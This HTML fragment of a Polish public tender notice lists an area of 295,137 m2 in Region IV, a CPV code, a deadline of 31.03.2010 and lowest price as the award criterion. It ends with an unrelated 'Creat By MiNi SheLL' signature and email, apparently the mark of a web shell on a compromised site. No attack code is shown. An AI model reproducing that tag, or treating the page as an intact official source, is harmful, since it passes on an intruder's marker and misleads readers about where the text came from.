<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rejon IV - ogółem : 295.137m2 w tym:
I standard       187.652 m2
                   				II standard      107.485 m2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com